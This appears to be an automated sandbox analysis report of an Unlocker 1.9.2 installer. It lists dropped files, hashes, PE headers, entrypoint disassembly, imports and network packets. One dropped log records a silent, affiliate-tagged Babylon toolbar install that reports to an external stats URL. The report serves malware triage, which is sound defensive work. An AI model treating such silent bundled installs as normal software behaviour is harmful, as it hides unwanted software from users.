                                                                                                                                                            Preview:BM~g......v...(.......:............g..................................................................................DDD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@..DDD....DDDDDD........................................DDDDDDDDDD....DDDDDDDDD........DD@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDD@@@@DDDDDDDDDD@@@@@@D..DD....DDDDDDD......................................DDDDDDDDDD....DDDDDDDDDD......D..D@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@DDD..D.....DDDDDD......................................DDDDDDDDD.....DDDDDDDDD......DDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDDD@@@@@@DDDD.......DDDDDD.....................................DDDDDDDDDD....DDDDDDDDDD.....DDDDD..@@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@DDDDDDDDDD@@@@DDDDDDDDD@@@@@@DDDDDD.......DDDDDD....................................DDDDDDDDD....DDDDDDDDDD......DDDDDD..@@@@DDDDDD@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                                                                                                                                            C:\Users\user\AppData\Roaming\Babylon\log_file.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (716), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2668
                                                                                                                                                            Entropy (8bit):5.580519497259905
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:nsyFvSwyjmFkBFnqPAtGIBX84dxTOvNlTw0tGu+84dxTjLmM:PFvly0kvnqPSAuOvbTB7du/
                                                                                                                                                            MD5:0C162D66ED16C5EB9884C940A4172221
                                                                                                                                                            SHA1:7AF743A90BF08416663EBB60C22D223C921CEC17
                                                                                                                                                            SHA-256:022AC19BD96D54692FD5760648531FDAC053AC459DBE0130B3A5F5790EDD1005
                                                                                                                                                            SHA-512:F32CEE2E621A79F17502F4B6F5392821E1E9A9AF035A62F7BB8458BC24885B1D947C65ABA50C565D4529B52D1A307FC23313536BD1AB10542CB203A782DA91BF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...----------- 17/02/23 - running v9.1.1.10 on 841675 (user:user) -----------.. Windows Path: C:\Windows..13:06:55 (Setup)-Command line: -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt...13:06:55 (Client)-LM file is C:\ProgramData\Babylon\BabAll.dat...13:06:55 (Client)-LM imported to file...13:06:57 (Client)-LM file access denied...13:06:58 (Setup)-UI lang: 0, src: 4...13:06:58 (Setup)-SourceDir: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\...13:06:58 (Setup)-InstallDir: C:\Program Files (x86)\Babylon\Babylon-Pro\...13:06:58 (Setup)-SilentInstall: 1...13:06:58 (Setup)-MinRequirements: 0...13:06:58 (Setup)-IsUpgrade: 0...13:06:58 (Setup)-TBInstallState: 4...13:06:58 (Setup)-SetupType: 50...13:06:58 (Setup)-SetupFlags: 42...13:06:58 (Setup)-PrevVersion: 0...13:06:58 (Setup)-TBInstall: 1...13:06:58 (Setup)-Report: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-star

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\README.lnk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Mar 31 20:28:36 2011, mtime=Fri Feb 17 11:07:00 2023, atime=Thu Mar 31 20:28:36 2011, length=1689, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):877
                                                                                                                                                            Entropy (8bit):4.574842873587008
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8m9DcXYXzhElcdpF4yfgrt1y3Y+KDMYjA8SmbdpMxqtbdpMx8wl5ieuieMBm:8m9DLd1mEI1DM8ArCd+8d+qwGexeMBm
                                                                                                                                                            MD5:C04F99A1FE6024B224A964D8091D6957
                                                                                                                                                            SHA1:12DAF6E9C5FDD7FBAF0031D9C4D41097EA77BD58
                                                                                                                                                            SHA-256:37D5B444B282158EF66E35042F2D3B4CE233DE8F8383CF0659F08E6ABD21B0C7
                                                                                                                                                            SHA-512:2BDEF554CE3C4222C1B8219358FE5F065E97FA20AFEB06BA81DD48E081CEB3CE21051C7A685D0869F7E2359F7C1147211E66A077F9966C56C3520B460655B5DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.... ....ZJ.}...HQ.V.B...ZJ.}...........................u....P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L.QV.`....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....Z.1.....QV.`..Unlocker..B......QV.`QV.`....T}.....................3$.U.n.l.o.c.k.e.r.....`.2......>.. .README.TXT..F......>..QV.`..............................R.E.A.D.M.E...T.X.T.......S...............-.......R...........N.9......C:\Program Files\Unlocker\README.TXT..<.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.\.R.E.A.D.M.E...T.X.T...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.`.......X.......841675...........!a..%.H.VZAj....#r.h............!a..%.H.VZAj....#r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Start Unlocker.lnk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Jan 9 23:32:34 2013, mtime=Fri Feb 17 11:06:59 2023, atime=Wed Jan 9 23:32:34 2013, length=124928, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):889
                                                                                                                                                            Entropy (8bit):4.49012432326617
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8mCLbBYXzhzHbdpF4yfgrOPeZYIjEjA+2bdpMxAxQbdpMx8wl5ceuceMBm:8mCCbd1veZvUA3d+iid+qwAebeMBm
                                                                                                                                                            MD5:3CC2AF61EC12B3938A7778F07186A468
                                                                                                                                                            SHA1:8C4F7BCF21A64261CFF3F98ED0F7DB9E1833889B
                                                                                                                                                            SHA-256:638ABA2B34BE993604D1DAE84D06FFD05FCAF0EBA15C6DB21E2A8EACBA960B96
                                                                                                                                                            SHA-512:81DB14E13F06585C40459183A6450D52C329D92453CE4845ECC961ECF96AFB35CC7D507179D491F73546DE09ACA2B3751105D9F977C9C2C61655939AF004F1E9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.... ....}.......R.V.B...}..............................{....P.O. .:i.....+00.../C:\.....................1.....QV.`..PROGRA~1..t......L.QV.`....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....Z.1.....QV.`..Unlocker..B......QV.`QV.`....T}........................U.n.l.o.c.k.e.r.....f.2.....*B.. .Unlocker.exe..J......*B..QV.`....Z}........................U.n.l.o.c.k.e.r...e.x.e.......U...............-.......T...........N.9......C:\Program Files\Unlocker\Unlocker.exe..>.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.\.U.n.l.o.c.k.e.r...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.`.......X.......841675...........!a..%.H.VZAj....#r.h............!a..%.H.VZAj....#r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):593
                                                                                                                                                            Entropy (8bit):2.7913299530091704
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:4xtCl0TMl//A9LY/dlrtmlXP/lGMy0fK1KRSAtSbdlrMrl6HRSAVlubdlrMrlF:8wl0TkXXdpsFFK4qbdpMxEsbdpMxF
                                                                                                                                                            MD5:2D83A59CB7C11AA6B7801CEF69A0B189
                                                                                                                                                            SHA1:D1CE98D8A3B9CDA21A97A4B9641E9E29C645C458
                                                                                                                                                            SHA-256:130A70D4025BE067A40B01F45C996A915E78CAF01CA0AA08BF56DD13F718252E
                                                                                                                                                            SHA-512:DD758D1D281C4FB8D96480A1FE90723C940497170E215589ED50B7B8D3DB1610F313D5696C629CC0DEFE8BB403CD4D49F5BF458152FCFE9AE25430C3A9BE2BAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F........................................................Q....P.O. .:i.....+00.../C:\...................h.1...........Program Files.L............................................P.r.o.g.r.a.m. .F.i.l.e.s.....Z.1...........Unlocker..B............................................U.n.l.o.c.k.e.r.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......<.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.....

                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Website.lnk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Fri Feb 17 11:07:01 2023, mtime=Fri Feb 17 11:07:01 2023, atime=Fri Feb 17 11:07:01 2023, length=56, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):889
                                                                                                                                                            Entropy (8bit):4.512564864647671
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8mOBYXzhzHbdpF4yfgrefK9ah3BjEjA+8SbdpMxAxrbdpMx8wl55eu5eMBm:8mrbd1O9ahxUAGd+iBd+qwVeaeMBm
                                                                                                                                                            MD5:67BCAE80E3004F1647DE862D79F81281
                                                                                                                                                            SHA1:F5DDE93DD152B5CFCD2F8510D8E01D65CFC6B9B3
                                                                                                                                                            SHA-256:A16C718FE9115FF39A1D71AF54FB11224B30352B580CD55A3BB0E59EFAC924ED
                                                                                                                                                            SHA-512:5D52B3EE731D7E8B4B9DBAF7B7DDF16C5A165362F4C10422B6475C0317E5825D52957139402880511D00A0C679C8B8D1B1E26B5CB49CF070A777FF41FFF11970
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.... ....H.W.B...H.W.B...H.W.B..8.......................{....P.O. .:i.....+00.../C:\.....................1.....QV.`..PROGRA~1..t......L.QV.`....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....Z.1.....QV.`..Unlocker..B......QV.`QV.`....T}........................U.n.l.o.c.k.e.r.....f.2.8...QV.` .Unlocker.url..J......QV.`QV.`.....}...................._.[.U.n.l.o.c.k.e.r...u.r.l.......U...............-.......T...........N.9......C:\Program Files\Unlocker\Unlocker.url..>.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.\.U.n.l.o.c.k.e.r...u.r.l...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.U.n.l.o.c.k.e.r.`.......X.......841675...........!a..%.H.VZAj....$r.h............!a..%.H.VZAj....$r.h...........E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Entropy (8bit):7.958432599476033
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:Unlocker1.9.2.exe
                                                                                                                                                            File size:1078591
                                                                                                                                                            MD5:1e02d6aa4a199448719113ae3926afb2
                                                                                                                                                            SHA1:f1eff6451ced129c0e5c0a510955f234a01158a0
                                                                                                                                                            SHA256:fb6b1171776554a808c62f4045f5167603f70bf7611de64311ece0624b365397
                                                                                                                                                            SHA512:7d0f1416beb8c141ee992fe594111042309690c00741dff8f9f31b4652ed6a96b57532780e3169391440076d7ace63966fab526a076adcdc7f7ab389b4d0ff98
                                                                                                                                                            SSDEEP:24576:eLMeYSiGTpTLDxxwqQcqOj5eyHox6ZGmAuXE7ZBlbT:+PbVvwqQpoLHontDrlbT
                                                                                                                                                            TLSH:C235231333E1E96AC1190B70A7DBD7B62772F3E22319874B7B0443AB5C252096F21E95
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z.........

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:a2a0b496b2caca72

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x4030cb
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x4B1AE3C1 [Sat Dec 5 22:50:41 2009 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:7fa974366048f9c551ef45714595665e

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            sub esp, 00000180h
                                                                                                                                                            push ebx
                                                                                                                                                            push ebp
                                                                                                                                                            push esi
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            push edi
                                                                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                                                                            mov dword ptr [esp+10h], 00409160h
                                                                                                                                                            xor esi, esi
                                                                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                                                                            call dword ptr [00407030h]
                                                                                                                                                            push 00008001h
                                                                                                                                                            call dword ptr [004070B0h]
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [0040727Ch]
                                                                                                                                                            push 00000008h
                                                                                                                                                            mov dword ptr [00423F38h], eax
                                                                                                                                                            call 00007FEA28D1BAA6h
                                                                                                                                                            mov dword ptr [00423E84h], eax
                                                                                                                                                            push ebx
                                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                                            push 00000160h
                                                                                                                                                            push eax
                                                                                                                                                            push ebx
                                                                                                                                                            push 0041F430h
                                                                                                                                                            call dword ptr [00407158h]
                                                                                                                                                            push 00409154h
                                                                                                                                                            push 00423680h
                                                                                                                                                            call 00007FEA28D1B759h
                                                                                                                                                            call dword ptr [004070ACh]
                                                                                                                                                            mov edi, 00429000h
                                                                                                                                                            push eax
                                                                                                                                                            push edi
                                                                                                                                                            call 00007FEA28D1B747h
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [0040710Ch]
                                                                                                                                                            cmp byte ptr [00429000h], 00000022h
                                                                                                                                                            mov dword ptr [00423E80h], eax
                                                                                                                                                            mov eax, edi
                                                                                                                                                            jne 00007FEA28D18EBCh
                                                                                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                                                                                            mov eax, 00429001h
                                                                                                                                                            push dword ptr [esp+14h]
                                                                                                                                                            push eax
                                                                                                                                                            call 00007FEA28D1B23Ah
                                                                                                                                                            push eax
                                                                                                                                                            call dword ptr [0040721Ch]
                                                                                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                                                                                            jmp 00007FEA28D18F15h
                                                                                                                                                            cmp cl, 00000020h
                                                                                                                                                            jne 00007FEA28D18EB8h
                                                                                                                                                            inc eax
                                                                                                                                                            cmp byte ptr [eax], 00000020h
                                                                                                                                                            je 00007FEA28D18EACh
                                                                                                                                                            cmp byte ptr [eax], 00000022h
                                                                                                                                                            mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                                                            Rich Headers

                                                                                                                                                            Programming Language:
                                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x5868.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x58d20x5a00False0.665234375data6.4331003482809646IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rdata0x70000x11900x1200False0.4453125data5.179763757809345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0x90000x1af780x400False0.55078125data4.617802320695973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .ndata0x240000xa0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .rsrc0x2e0000x58680x5a00False0.15108506944444444data3.417266606112887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                            RT_BITMAP0x2ea780x666Device independent bitmap graphic, 96 x 16 x 8, image size 1538, resolution 2868 x 2868 px/m, 15 important colorsEnglishUnited States
                                                                                                                                                            RT_ICON0x2f0e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States
                                                                                                                                                            RT_ICON0x2f9880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States
                                                                                                                                                            RT_DIALOG0x2fef00xb4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x2ffa80x120dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x300c80x118dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x301e00x202dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x303e80xf8dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x304e00xeedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x305d00xb4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x306880x120dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x307a80x118dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x308c00x202dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30ac80xf8dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30bc00xeedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30cb00xb4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30d680x120dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30e880x118dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x30fa00x202dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x311a80xf8dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x312a00xeedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x313900xb4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x314480x120dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x315680x118dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x316800x202dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x318880xf8dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x319800xeedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x31a700xacdataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x31b200x118dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x31c380x110dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x31d480x1fadataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x31f480xf0dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x320380xe6dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x321200xa0dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x321c00x10cdataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x322d00x104dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x323d80x1eedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x325c80xe4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x326b00xdadataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x327900xa0dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x328300x10cdataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x329400x104dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32a480x1eedataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32c380xe4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32d200xdadataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32e000xa4dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32ea80x110dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x32fb80x108dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x330c00x1f2dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x332b80xe8dataEnglishUnited States
                                                                                                                                                            RT_DIALOG0x333a00xdedataEnglishUnited States
                                                                                                                                                            RT_GROUP_ICON0x334800x22dataEnglishUnited States
                                                                                                                                                            RT_MANIFEST0x334a80x3beXML 1.0 document, ASCII text, with very long lines (958), with no line terminatorsEnglishUnited States

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                                            Possible Origin

                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                            EnglishUnited States

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Feb 17, 2023 13:06:59.920208931 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.033178091 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.039155006 CET8049695184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.039315939 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.039767027 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.151659966 CET8049696184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.151812077 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.152195930 CET4969680192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.157639027 CET8049695184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.159986973 CET8049695184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.160046101 CET8049695184.154.27.232192.168.2.4
                                                                                                                                                            Feb 17, 2023 13:07:00.160120010 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.160166979 CET4969580192.168.2.4184.154.27.232
                                                                                                                                                            Feb 17, 2023 13:07:00.270435095 CET8049696184.154.27.232192.168.2.4
